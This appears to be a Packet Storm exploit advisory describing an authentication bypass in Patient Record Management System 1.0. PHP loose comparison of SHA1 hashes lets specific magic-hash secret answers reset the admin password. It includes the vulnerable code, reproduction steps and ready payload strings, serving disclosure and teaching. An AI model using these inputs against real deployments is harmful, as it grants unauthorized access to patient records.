exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Patient Record Management System 1.0 Authentication Bypass

Patient Record Management System 1.0 Authentication Bypass
Posted Jan 20, 2023
Authored by Joe Pollock

Patient Record Management System version 1.0 suffers from an authentication bypass vulnerability during account recovery.

tags | exploit, bypass
SHA-256 | fcbfb754db1b7a2c678e6eb2a40d7a65fc9eaf4b77ffc390b629b6009685d209

Patient Record Management System 1.0 Authentication Bypass

Change Mirror Download
# Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison
# Exploit Author: Joe Pollock
# Date: January 19, 2023
# Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip
# Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5
# CVE: T.B.C
# Vendor: kimcey500
# Version: 1.0
# Exploit Description:
# Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of
# the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator.
# If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication
# bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:

public function get_forgot_secret($login_id, $secans){
$this->db->where('u_id', $login_id);
$query = $this->db->get('users');
$decrypt = $query->row()->u_secretanswer;
if(sha1($secans) == $decrypt){ // md5 encryption
return $query->row();
}
}

========================================================
(+) To reproduce this exploit:
========================================================
1. Log in as the administrator and navigate to the password recovery functionality (https://localhost/Indexcontrol/secretquestion).
2. Enter the ‘Current Password’ then select any ‘Secret Question’.
3. For the ‘Secret Answer’, use the following: 10932435112
4. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account.
5. From the admin login page, click ‘Forgot Password?’.
6. Enter ‘admin’ as the username then click ‘Submit’.
7. For the ‘Secret Answer’, use any of the following:

aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap

8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed.

========================================================
(+) Explanation:
========================================================
Following from above, assume the administrator has chosen the following as their secret answer:

10932435112

The application then stores the SHA1 hash of the secret answer in the database. The stored hash is:

0e07766915004133176347055865026311692244

The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers.

In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE.

It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash.

Any of the following secret answers could be used to bypass authentication:

aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap

See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md

The comparision which would take place by the application in get_forgot_secret() is:

if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){
//Reset password

Which becomes:

if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){
//Reset password

Due to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to change
the password of the account.

You can try this yourself using the interactive PHP interpreter:

var_dump(sha1('aaroZmOk') == "0e111");
var_dump(sha1('aaroZmOk') == "0e222");
var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));

========================================================
(+) References and more information
========================================================
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md
https://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
https://www.whitehatsec.com/blog/magic-hashes/
https://github.com/spaze/hashes
https://offsec.almond.consulting/super-magic-hash.html































Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close